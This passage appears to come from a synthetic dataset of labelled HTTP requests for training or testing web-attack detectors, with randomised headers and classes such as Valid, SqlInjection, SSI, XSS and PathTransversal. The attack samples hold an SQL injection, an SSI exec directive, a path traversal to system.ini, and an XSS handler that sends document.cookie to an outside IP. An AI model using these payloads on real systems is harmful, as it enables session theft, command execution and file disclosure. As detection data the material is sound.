If-Range: *
Max-Forwards: 1229
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Ietga urmeulj=Dhnw
Authorization: sNnmpe aewals=tdna
Range: -58387
Referer: /lrenr.avi
TE: trailers
Trailer: Upgrade
User-Agent: lsrlmsenloareM
UA-CPU: PowerPC
UA-Disp: 092,903,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 493x9189
Via: 1.8 135.62.95.108:8
Transfer-Encoding: gzip
Upgrade: cds2Qc/0.8, daru/8.7, roew/2.1, hnm/9.5, saile/8.5
Warning: 220 www.tsD6ut.gif "ha9a5t5Ohfst9e" "Sun, 30 Nov 08 09:52:40 UTC"
X-Forwarded-For: 199.75.6.60
X-Serial-Number: 45559404209574
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9771
Start - Id: 42515
class: SqlInjection
GET /hExndtualsaRcelnhea/1nEap7a/ksWY/hhesipnayma/ij1HPICxXt/RxBONftelnetm-62/sr9N@rNtdvSdMuX/tmtsibnnir/lBioW/d4yf4nZeHi.jpeg?KjfQRPwp7RM9=r9Et2lc&ohqdlnotli=o48NmUz_TR&Mwinnt2IBl=++OR+++++2+++++%3E+++1&hgVwc4ledtsi6dn=%3Bw%40o++oyecte%5Drrii+supdate&zxd5o=%27a&ef=7&H1=3&wJq=5778533&uudseeIDtdaa=6500449576 HTTP/1.1
Host: www.tasVinopy.cz:80
Connection: Ssoioo
Accept: */*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=4606
Client-ip: 17.1.105.246
Cookie: Bexohg=ft3ttwgp7%;dnwlxqcNBo=tuustdinanee 4Atai ]oa;issnaeSma4oxuo=lyoqoet0xsev
Cookie2: $Version="7"
Date: Sat, 14 Feb 09 17:51:20 CET
ETag: "QTJNs90GRqYP0w9uxk2"
Expect: 100-continue
From: be38Ged@6e9snto.ch
If-Modified-Since: Mon, 15 Dec 08 04:40:03 UTC
If-Unmodified-Since: Sun, 02 Sep 07 04:25:35 UTC
If-Match: *
If-None-Match: "Y7Ga5Ph4W0WY2K95HFgb"
If-Range: Sun, 27 Jun 04 18:12:58 UTC
Max-Forwards: 24
MIME-Version: 6.8
Pragma: 5b=lEen
Proxy-Authorization: NTLM UGFhaXllcmFpZWVlc2VFaTlxbm41enFvb3dEeHNsbmE=
Authorization: NTLM ejBvcXRkeGNyZWV0aXV1QWl5YWNhdGZydW5zcnU4b3IxYW1reXVtTm4=
Range: 430-,2-8084
Referer: http://www.eeTlo.biz/Treu.cfm
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: Mozilla/1.0 (X11; U; Unix 6.9; a0-ht; rv:6.2.7) Gecko/55270462
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 5.6 65.222.130.51, 4.1 www.Rbsg.png
Transfer-Encoding: f2s3n
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 860 252.84.118.119 "gymdt4aeaea4ehhX" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 171208894897748
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42515
Start - Id: 15388
class: Valid
GET /jXNn8/aer/aipsaE0efbo0Abuspa/Qcra6eye/dWyypy6illNvzph/tanttrt5ga5enhtk/epjwslZZ.mg8M@ASAG/esJ170w9Bs/GmADTSxYimgfG.accept/a@CK/ePVh6gYJap.php? HTTP/1.0
Host: 238.229.143.250:3942
Connection: keep-alive
Accept: video/*, audio/basic, application/*
Accept-Charset: utf-7;q=0.3, windows-1253;q=0.6
Accept-Encoding: 
Accept-Language: ecot-jC;q=0.6, uwfleonk-nt4sric, eitytsr-crh
Cache-Control: dimfv=nf
Client-ip: 32.88.148.234
Cookie: CqtsnwRUl=7469331616;UTA.ji=0942;s.Gg4=lEdei;rctnsdls=15154
Cookie2: $Version="5"
Date: Wed, 04 Apr 07 15:03:10 GMT
ETag: W/"d@.lhoUPWXbNxK2x06H"
Expect: taS04eor=niqoa2A
From: geinl@l3cifnrd43.fr
If-Modified-Since: Sat, 05 Jul 08 16:02:12 CET
If-Unmodified-Since: Tue, 31 Jul 07 09:02:03 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 41
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: eeaeg nrstl=TnFalO8t
Authorization: Digest response="4fee8dA8B1AAdBaceba7687A41A1FaD6"
Range: 96924-,-3,41-800
Referer: http://trvela.gov/zduhac/piona/wt4idooe.html
TE: gzip,deflate
Trailer: Connection
User-Agent: Mozilla/6.5 (Machintosh; U; PPC Mac OS X 2.9; ma-lE; rv:4.9.2) Gecko/48951051
UA-CPU: x86
UA-Disp: 8387,983,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5103x7782
Via: aoqRt/8.1 www.ireer.jpeg
Transfer-Encoding: gzip
Upgrade: ajwlas/3.1, qwr/3.1, 489/9.8, uqmyew/2.2
Warning: 419 27.114.182.34 "Xw3obuidts2de8iEei" 
X-Forwarded-For: 76.40.16.131
X-Serial-Number: 7835814731
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15388
Start - Id: 9292
class: Valid
GET /rqwotzgstEgrIi/kO7RbIR.jsp?jqeaboanne=tlaheoeonSUtsEor&km6=076365&in4e64oVLilx=vn%3Bnowl%3Floomir&0neumaiDi=access_log+n&hnrt1ltya=ol-ewinnt0he6ekbSog&rD_t=servicesete+&nhG52v=xLgv9NF&hjubes=%28%3Bu3h&Dhtx7es=vrlo&Rdc=eetM%2BSq1h8modaan+pA&4ns0taLqOm=11154&4y9toaeegnci=umochas0aoa&afomCnicn=i2reiht&qrooiiis=stairANieasehamoeh&iayghre7uze=60 HTTP/1.0
Host: www.fje5r.cz
Connection: keep-alive
Accept: video/*, text/html
Accept-Charset: windows-1251;q=0.4, euc-tw;q=0.6, euc-tw
Accept-Encoding: deflate
Accept-Language: oero0eti-entir;q=0.9
Cache-Control: caapaS='n9ul5b3'
Client-ip: 201.8.180.111
Cookie: yeyehm=sndL;ump=sro:;eok;ilepl=utmV6sn2
Cookie2: $Version="605"
Date: Mon, 30 Jan 06 06:15:17 UTC
ETag: W/"u2PwNFjHljIR9rv2hs@z"
Expect: ejrw=feEent06;sLesp=hRhwpg
From: clbdsbE@ouRcuroAt.it
If-Modified-Since: Tue, 24 Feb 04 01:29:09 UTC
If-Unmodified-Since: Mon, 03 Nov 08 17:11:38 CET
If-Match: "@8_eceVAAyAcrVPxZN@x"
If-None-Match: *
If-Range: Tue, 27 Apr 04 05:49:12 GMT
Max-Forwards: 5988
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic c2FvdDp0bU55bGt0
Authorization: ehago nt0i=iT6n
Range: -7,24425-
Referer: http://www.irCea.be/tuiuT.mdb
TE: gzip,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.2 (Windows; U; WinNT 3.5; ag-af; rv:2.0.1) Gecko/12066639
UA-CPU: 68000
UA-Disp: 8443,1614,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6875x133
Via: HTTP/7.9 63.75.200.255, aeE/5.2 www.caPzhBw.js, npahn/3.9 www.rKLf3o.jpeg
Transfer-Encoding: wgeati
Upgrade: ne3a/3.0, ktz/8.6, tsjraE/5.2, hlfe/6.2
Warning: 773 228.146.161.18 "eogoeOendth" "Tue, 23 Jan 07 17:19:26 CET"
X-Forwarded-For: 215.205.82.248
X-Serial-Number: 378312956268
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9292
Start - Id: 40035
class: SSI
GET /5EM-s50o44FS1e/attdtzeowh9ir0/RAoeN8wb/-4x6Lz9F./y9/.IGLwIp.jsp?RF=Iaa4ekir&ArDeppEnesnhe=%3C%21++%23%3C%21--+++++%23exec+++cmd%3D%22id%22--%3E&Uhh8=gi HTTP/1.1
Host: 71.222.145.43
Connection: 8divaoto
Accept: */*
Accept-Charset: x-mac-hebrew, iso-8859-3;q=0.2, iso-8859-6;q=0.9, euc-tw;q=0.6, x-mac-hebrew;q=0.7
Accept-Encoding: gzip;q=0.4, deflate;q=0.9
Accept-Language: ei-t4, l-e, p-mna8Nu;q=0.3, e-optbcs
Cache-Control: no-store
Client-ip: 160.214.20.200
Cookie: eweecmn5=hLXWoeKlnlSes5tnaE;ppnnbOfrom=sXIAKy27;4aTYJO=wl_o2;sautst=085943;SUbgnotw=r3c9i9aai7l
Cookie2: $Version="98"
Date: Tue, 20 Jan 04 07:38:31 GMT
ETag: "1oi95JajISSvSc6NmwV"
Expect: 100-continue
From: loaa@ioendeSshb.it
If-Modified-Since: Fri, 05 Aug 05 01:08:42 GMT
If-Unmodified-Since: Wed, 17 Aug 05 02:05:33 CET
If-Match: *
If-None-Match: "JMbjdCFoWIX-OVjrd"
If-Range: "wF2Fa-zKqQovo@gtN"
Max-Forwards: 02
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest username="tsbedo"
Authorization: lxsriy ycusa=blqo
Range: 41683-1312,-3
Referer: http://ttcoDhe.be/q9uet.js
TE: deflate;q=0.4,trailers
Trailer: Warning
User-Agent: 8opepi8iai/0.1.5.1
UA-CPU: MIPS
UA-Disp: 704,609,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 1.1 www.ahd42b.css, BIhte/0.9 76.80.83.86:72, HTTP/1.3 www.qiet.tiff
Transfer-Encoding: gzip
Upgrade: amunh/3.4
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 117.150.72.121
X-Serial-Number: 36197
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40035
Start - Id: 6387
class: Valid
PUT /mCMB465HV/ag/ase/l8nietejsajhoXfoN2a/bT5JoBzSgyAmMvFaC/ZFAV0E/hnrn8enSrbrma/oeilq3/siyY6gr9JPcK_b3S./sbuAwOXSplJ7Y45.tiff? HTTP/1.1
Content-Length: 152
Content-Language: cWs,uvooii6o,tjiligfs
Content-Encoding: identity
Content-Location: http://edttt9ah.gov/r3Me/csmauac/tsueott1/EfqnsaA.mspx
Content-MD5: T3VlZ2VzNXdwc2VwYWljZw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 12 Apr 10 22:55:13 CET
Last-Modified: Wed, 24 Dec 08 12:44:03 UTC
Host: www.te2knT.net
Connection: keep-alive
Accept: audio/*, image/gif, application/x-tar
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: uqe-roe;q=0.1, F-aasb3, 7t-sego1ta;q=0.8, kc5r-hT
Cache-Control: no-transform
Client-ip: 113.133.52.70
Cookie: soeoaifeTVdn=txfwgettacceptolego q2N 
Cookie2: $Version="01"
Date: Thu, 10 Jan 08 03:41:27 CET
ETag: "GeadtqpgChYvdpC"
Expect: uUAn
From: 2wd8O@tldltfa.biz
If-Modified-Since: Thu, 22 May 08 11:56:45 UTC
If-Unmodified-Since: Sat, 11 Aug 07 16:00:11 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 07 Jul 06 17:21:29 GMT
Max-Forwards: 095
MIME-Version: 1.6
Pragma: nsbDi='oul'
Proxy-Authorization: Basic cnJzdWRpaDpzN3RuZXU=
Authorization: Digest nonce
Range: 97098-
Referer: http://lzabp6.st/3eteoe/id5lda/Serettna.cfm
TE: trailers,deflate,chunked
Trailer: Accept-Charset
User-Agent: Mozilla/6.7 (X11; U; Linux i386 9.6; hs-th; rv:9.8.0) Gecko/16158192
UA-CPU: MIPS
UA-Disp: 131,664,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4815x4543
Via: 8.8 67.120.76.240:5, FTP/3.8 49.182.55.103, 6.3 www.heoac4.html
Transfer-Encoding: identity
Upgrade: senIyc/2.5, Chowao/4.4
Warning: 328 3.138.213.144 "lmuOhocahea5tEu" 
X-Forwarded-For: 232.129.69.76
X-Serial-Number: 10020198390
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

enoyd=ujrpeeep&dreisajahsnt=8405186&sswmkg=|a&AzaelabtteimR=g6lue8A&um=m8xIeMYa@-&neapiTs=817&cuemo=@i ~wiaehe(z/Atdi=&eonuNsmni=142860196

End - Id: 6387
Start - Id: 32057
class: Valid
GET /eotlee/oO_YqO8TK3XjEAJqt.bin?ofnta7rsr=8e53%27ni8%27irmtE+m&agroup byB4b5=lbooih%40fbac&ejcesYtlaiLujEa=pa+etcp&m44rdLY=515&hwEhe=ezT&eucottfruozv=npMsgyXo&rsx=eBrCfJM&okgoFd=840060&rtcoGre8Ctd=lnf%3F&kjt=hheine%40 HTTP/1.1
Host: www.Ehit1.org
Connection: close
Accept: application/x-tar;q=0.4, video/*;q=0.1
Accept-Charset: iso-8859-5;q=0.4, utf-7, macintosh;q=0.2, x-mac-turkish;q=0.1
Accept-Encoding: identity, gzip;q=0.7, compress;q=0.8
Accept-Language: vkHoev-1ynU3, i-oimm;q=0.6, o-aIc7mqBj, sann-d;q=0.0
Cache-Control: only-if-cached
Client-ip: 83.23.198.140
Cookie: ee=3rn7uL;stdin%uDmm1BCt0autoexech=564223
Cookie2: $Version="7"
Date: Tue, 13 Feb 07 02:53:01 CET
ETag: W/"qAkeEvge-usYZ38PeGQ8"
Expect: 100-continue
From: hGao@Hawa.uk
If-Modified-Since: Mon, 22 Nov 04 24:18:30 UTC
If-Unmodified-Since: Fri, 05 Nov 04 22:42:30 CET
If-Match: "H2yvcz8RPHX.d1gK"
If-None-Match: *
If-Range: Sat, 28 Feb 09 01:02:40 UTC
Max-Forwards: 87
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic aGx1ZTppbHJ0ZQ==
Authorization: aSLf0 ryrrt=snrzIdtr
Range: 81-,-8,-69673
Referer: /boee/tpnrio2n/ejElmA7s/nweva/OeHtatw.aspx
TE: chunked;q=0.5,gzip
Trailer: Authorization
User-Agent: Mozilla/7.1 (Machintosh; U; PPC 8.4; st-aa; rv:2.4.7) Gecko/96341762
UA-CPU: x86
UA-Disp: 342,5429,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8661x2250
Via: HTTP/6.3 www.oiohEin.jpg, FTP/8.7 www.eilxm.png
Transfer-Encoding: compress
Upgrade: Leh/7.4, odi/8.1
Warning: 652 183.221.129.170 "snnhhrllRstie" 
X-Forwarded-For: 211.198.61.151
X-Serial-Number: 16576925520335
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32057
Start - Id: 46644
class: XSS
GET /.fxJtL/oVWglcugdHmWE.vS/aTN4mROFWO-t@dY.bin? HTTP/1.1
Host: 24.36.210.45
Connection: close
Accept: text/*, audio/*
Accept-Encoding: *;q=0.0
Accept-Language: *
Client-ip: 37.218.107.50
Cookie: aenntoanr=->nl[osg;oulaei9qjoerdl=e3oasrlye;rRbKNHF=srRxu0Oat6eqdbvaa;446CeRsx4Be=152610425
Date: Thu, 11 May 06 08:13:25 CET
Expect: nrfk
If-Match: *
If-Range: "ewJu9VgBZU.Uxntv"
Max-Forwards: 1272
MIME-Version: 1.7
Referer: /4hrsei/5qhkks3/tBmb6/acifeif.jpg
User-Agent: <div     onmouseover = "    [window.open('http://62.182.175.199/rongns.bin'+document.cookie);]   "  >

null

End - Id: 46644
Start - Id: 7416
class: Valid
PUT /pxj_mPTExm95dnNOq/yz.ngGoy8/s7g8otedinseeq/iWYOA_s7WWZhW/i4Easi.dll? HTTP/1.0
Content-Length: 131
Content-Language: 8teD,a,s1Feop
Content-Encoding: compress
Content-Location: http://www.a9ea5.net/rb8msi/m5eaouz/3goO/Awda8e.html
Content-MD5: U1Nxcm90c3JsYmh5amppbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 26 Dec 07 08:40:10 GMT
Last-Modified: Tue, 23 Sep 08 20:38:00 UTC
Host: www.phtp.ch
Connection: close
Accept: audio/*;q=0.6
Accept-Charset: windows-1250;q=0.8, x-mac-japanese;q=0.9, iso-8859-6;q=0.7, iso-8859-8, windows-1257
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 7.158.25.22
Cookie: wnw=57021;8Imetlla=$;f0nUeaHjp6sct= ;NiD5xordceb0col=urK hrw \;ZFiframeWasl5=woxRwadtltuta;nia8=0eer8
Cookie2: $Version="19"
Date: Fri, 06 May 05 09:14:21 UTC
ETag: "Qieo9vlVGBA7n@NP4xmq"
Expect: xjh8tBr=tTua;hitesdl=t9dAmimt
From: lKiext@4bU5bHmi.st
If-Modified-Since: Sat, 10 Jan 04 05:32:39 UTC
If-Unmodified-Since: Sat, 07 May 05 16:56:10 GMT
If-Match: "PleYiXxTqrkUfkFR6i"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 3.8
Pragma: tte1eu=rjat
Proxy-Authorization: asue bpcdhTC=a83idrez
Authorization: NTLM Z29zcm5sZTBFa04zZWFyZWV1bTFyaWVkZG5jb2lOYWZjcmVzdGRl
Range: 8281-
Referer: http://www.oefnAemn.ch/0o5h.js
TE: deflate
Trailer: If-Range
User-Agent: nimsg2 (ssKI2rgLV; hlRyMmdZbN; epvWQ_D; g@Kxworp; eoEIWqLK)
UA-CPU: StrongARM
UA-Disp: 0192,953,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9649x7067
Via: HTTP/3.8 www.9necd.html
Transfer-Encoding: gzip
Upgrade: e0oa/2.6, 6hGin/7.9, iOeH/3.0
Warning: 977 www.izsgxrn.htm:079 "ciknTo7etsah" "Tue, 27 Apr 04 18:00:29 CET"
X-Forwarded-For: 248.139.237.35
X-Serial-Number: 51648085743746
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Y.34yZX=Te<d[;R&donoPatatrbwap=rCs0kRf_La&npuhu0yd=?iaSs&oqic=06161&ronAasnsodNy5rs=87&olh3soieh=66757&J5.FOPEO61=aiinsertn

End - Id: 7416
Start - Id: 36097
class: PathTransversal
GET /cYzqxAL82hwc4WS/lsoEQa3err8/it8/nRM.xgMoaNtkM7R/aoupazshto.jsp?adminHFC0=uPMYB7Nh&X_whereNnV=wlz9KE8doV2J&sq=t3eeLid8omigle&hebvq=oatNhe%7Ci&AzhlTeYi=easnp7grhni&tkheos6tlmztmt=aHhCINP4pt&gLisutgniodNt=641428905&es=267&nemahas=3998965248&_6m8cRT6I2V0=1rupknia7&nej=937&asp5tdracsa2IhQ=Iyl4b8%28t&save=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&fdeatHlt7eos3=a%3A%7Ec HTTP/1.1
Host: www.gpeids.org
Connection: keep-alive
Accept: audio/basic, image/png;q=0.2
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.9, deflate;q=0.4, deflate;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 200.55.112.27
Cookie: 0telnet@rmuU=3eoOz@atmplw;fromPRLzPE73Au=t(e;e;oBL.NbKmV=aiukiabhans0lw8;4h=EsdroixoOr4;KR_0AfzpassthruTh=$
Cookie2: $Version="6"
Date: Tue, 02 Dec 08 18:02:24 GMT
ETag: W/"Og53tD5Fr.sQ6S3"
Expect: tyscmrym
From: 2srfon@a2wsst04Ft.cz
If-Modified-Since: Mon, 25 Oct 04 20:58:02 UTC
If-Unmodified-Since: Fri, 26 Sep 08 23:25:49 UTC
If-Match: "9D4fY42SD-lYq8pqMe"
If-None-Match: "IYfKKcGoZz4j.DmoV"
If-Range: Fri, 20 Jan 06 02:55:41 UTC
Max-Forwards: 356
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest nonce
Range: 78-
Referer: /Hfdr/Mlre8rAu.php3
TE: trailers,gzip;q=0.8,gzip;q=0.8
Trailer: If-Match
User-Agent: Mozilla/1.9 (X11; U; Solaris 8.9; eg-nt; rv:0.0.9) Gecko/46859143
UA-CPU: Sparc
UA-Disp: 9693,338,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6563x796
Via: FTP/1.1 www.k5ctee.htm, 7.0 120.124.161.100:0, 5.5 www.niAni.js
Transfer-Encoding: gzip
Upgrade: Fd1sk/0.3
Warning: 206 www.wtehi.html "rfrneAalg3inhttgnz" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 5507795373725385751
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36097
Start - Id: 31961
class: Valid
GET /tyaxtjIlcw/iM6gvqbbU.js?8ebr2dn=elrbplld0ri&ceWa=9005&wVyYorlocation@D9a=697687&hs1lieIiin=%25&h@cGR=+%5CsmiRi%3Ci&ytl4uwtt9Nt7f7f=nph-hfnq%28Ec%5D&gvNshpraw=iapetD1mzMAe7n&te5fnnuTogtpiO=nJo&CDJcT=e5Vw&uiahvig=2Ss&sop8o0nt=96598&6mxyeetj7Szs3=3Ig HTTP/1.0
Host: 147.57.104.41:80
Connection: close
Accept: image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 187.119.181.62
Cookie: aanw=1updatendivs;ymhhyhsen=0ti;jas=bOctmbvht
Cookie2: $Version="097"
Date: Tue, 04 Mar 08 13:53:38 GMT
ETag: "KCBOVIk-l57l3RK7"
Expect: oh4tn
From: wamiac@4nepios.fr
If-Modified-Since: Mon, 24 Jan 05 07:46:02 CET
If-Unmodified-Since: Sat, 27 Nov 04 12:46:10 CET
If-Match: *
If-None-Match: *
If-Range: "txdM4tx2JvkhQoE"
Max-Forwards: 5
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: etsnds WdnRHatk=rhdNp
Authorization: latoT bl8e=teIuh
Range: -3
Referer: http://www.eCasnlhh.st/1oSmA.jpg
TE: chunked;q=0.2,trailers
Trailer: Pragma
User-Agent: Mozilla/2.5 (Machintosh; U; PPC Mac OS X 9.8; oc-ns; rv:9.7.4) Gecko/11194504
UA-CPU: Sparc
UA-Disp: 3482,947,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3303x4060
Via: FTP/6.4 4.110.146.147
Transfer-Encoding: paiD; e1Bas3ed=luiali
Upgrade: ncej/3.7, hiyr3/1.0
Warning: 148 www.psN0t.tiff "Ha8aevrPaReu2aaa" 
X-Forwarded-For: 24.237.69.183
X-Serial-Number: 372913
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31961
Start - Id: 862
class: Valid
GET /tYZtv28/eAay6.swf?aarodi7t=mtwo5nossose&eEFpaersMq=tsgcdot&21eraeu=tzji%7Eda%3Feidmailcber&emssDrehn=akHTynZ&sesnhikis8t3om=btEao&hcieet6ewdoea=4nph-N&cmwyEh9dojSro=nisonnoaf&eSeun=tmi0BszJ-&ARscWhsAFu=+HnN+%26n%2FiS2stelnetaso+Isg&ExndcAo=a9shutdownsn&Lfdxwr=sytmptpassthrue&Dtjrha=oytsHir&rwsto=4SS6&nrEtoSoy=gfis%5Cdl&0d=ricnwu4gnrvsse HTTP/1.1
Host: 54.126.21.84
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 91.43.148.55
Cookie: a78sgiieMwls=enkA5Gva4;gsnha4htveey=4+ Et;fooalSnbhoirtr=12
Cookie2: $Version="73"
Date: Sat, 05 Mar 05 06:02:36 UTC
ETag: "z.JVt4yr9ZxbvMY_0PAC"
Expect: 100-continue
From: a1evt@iee3eeDn.it
If-Modified-Since: Thu, 18 Mar 04 05:34:15 GMT
If-Unmodified-Since: Sun, 24 Jul 05 18:42:48 GMT
If-Match: "ZO245NXFMjOaeE8tlK"
If-None-Match: *
If-Range: "w3UxByrtkS_IVAq6Bi"
Max-Forwards: 456
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM NW5qZXdhaW1ybzNpc2FybDBhc25zZXhpRW5kVGUzaTdldGk1MGFr
Authorization: inmg l0meid=init8nnq
Range: 95471-
Referer: http://www.yscar.cz/e8DiofR/5xap/kiEac.cfm
TE: deflate,chunked;q=0.3,trailers
Trailer: Referer
User-Agent: N2mtTrrw
UA-CPU: x86
UA-Disp: 1675,0086,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 130x106
Via: 7.0 www.tte97a.jpg:0
Transfer-Encoding: compress
Upgrade: egr3ra/0.6, ttlAni/8.2, lss/8.2, Nehhrl/4.6, vSE/1.0
Warning: 516 www.cSed.gif "3esIs8eap6a" "Sat, 13 Jan 07 17:36:06 GMT"
X-Forwarded-For: 44.170.70.161
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 862
Start - Id: 21406
class: Valid
GET /ste4nlevn/ajAw_tOzrQjJhW/ieswitilE/6M_UX/oeLie3mNashsta.dll? HTTP/1.0
Host: www.usnwstef.fr
Connection: smwrnibo
Accept: audio/x-wav, application/*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: hfexl-cainie, 10I-xfRu3;q=0.9, mbsret-m3, saohh-xderaf, td-Tptwso;q=0.2
Cache-Control: no-cache
Client-ip: 209.235.7.148
Cookie: bi=528;oiadv=t9j
Cookie2: $Version="3"
Date: Mon, 13 Nov 06 06:03:55 UTC
ETag: W/"x0kID_htrang7D8sCQx3"
Expect: qntPidc=jxEE3hka;one4o=e1n7
From: ue00ax@inea0en.net
If-Modified-Since: Tue, 13 Jun 06 01:26:46 UTC
If-Unmodified-Since: Thu, 29 Jun 06 23:08:01 GMT
If-Match: *
If-None-Match: *
If-Range: "hPrQg1wdKCoTZ2W"
Max-Forwards: 763
MIME-Version: 7.5
Pragma: b7ehE='n4ftD'
Proxy-Authorization: Basic bGROYWVGYTpibmo0a29mZQ==
Authorization: Basic YWEwaTpkYWZydw==
Range: 9389-552,913284-,86-
Referer: /heihoor/s9awdt.jpg
TE: trailers,chunked;q=0.6
Trailer: From
User-Agent: Mozilla/4.0 (X11; U; Open BSD i586 2.5; so-q4; rv:4.6.0) Gecko/32616997
UA-CPU: PowerPC
UA-Disp: 6376,0383,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 528x4272
Via: FTP/7.2 www.uofo.jpeg, HTTP/3.9 119.38.250.5, 2.8 www.yoOe.htm
Transfer-Encoding: identity
Upgrade: O9a1kz/8.8, oleC/5.4, shee/7.3
Warning: 217 7.232.161.211 "en9ruae" 
X-Forwarded-For: 131.153.107.61
X-Serial-Number: 2418413
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21406
Start - Id: 5459
class: Valid
POST /qNYyNEHkPygv2PMAoMEi/se8Wucttnc/IAX9/Bic4chovbavpt8EtOLel/msiIjyR8enaGz6F/eWbuAILNjx6jqYuB2/xmi-WsTopc2g1a/Dseeianiarthas.php4? HTTP/1.0
Content-Length: 21
Content-Language: 8
Content-Encoding: identity
Content-Location: http://emog.biz/m2Lhacis/osia/apn9s/cwiaoti.swf
Content-MD5: bG9lbW5yY250Z0hMNnB0bg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 Jan 05 04:10:55 UTC
Last-Modified: Sun, 20 Apr 08 19:47:54 CET
Host: www.clou.net
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: compress
Accept-Language: oiZoe-saH;q=0.4, ns-e2;q=0.4
Cache-Control: max-age=6
Client-ip: 45.222.201.177
Cookie: 1qsx=flDH.YUyE4H;eaaey07r5fhss4=pefM@Pb;5an=tdnTdiv
Cookie2: $Version="026"
Date: Thu, 01 Apr 10 20:42:33 UTC
ETag: "5DxH4NUkctaWASH"
Expect: 100-continue
From: seeYcrmn@lLtnoeFTi5.org
If-Modified-Since: Tue, 07 Oct 08 16:56:24 UTC
If-Unmodified-Since: Thu, 08 Feb 07 06:40:45 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 07 Dec 05 10:30:37 GMT
Max-Forwards: 62
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest response="d2FB16AdF8542191FCf959b23cfAeb86"
Authorization: NTLM YXFjZW9lRWFudXRlaXJscmhyZWNrb1RwYXRuaWF4dWhoZWZhMGFsaGd3dHJ1MHBl
Range: 25867-
Referer: http://ocOmbr.de/Ehtif/24aapeqn.gif
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: gofoIosxsseOi396ye
UA-CPU: PowerPC
UA-Disp: 7113,056,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1579x1357
Via: ibl/2.6 www.yuebX.jpg, FTP/1.5 245.103.194.186, 6.9 www.eqor.tiff:7
Transfer-Encoding: deflate
Upgrade: Vue/6.2, ts5om/7.6, wrw/1.5, uvNzee/0.6
Warning: 198 www.earWees.jpg "iai98tpeegtl0r" "Sat, 12 Aug 06 14:50:22 CET"
X-Forwarded-For: 180.40.114.160
X-Serial-Number: 757852
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eedoh7zee=Php0leRcdth

End - Id: 5459
Start - Id: 320
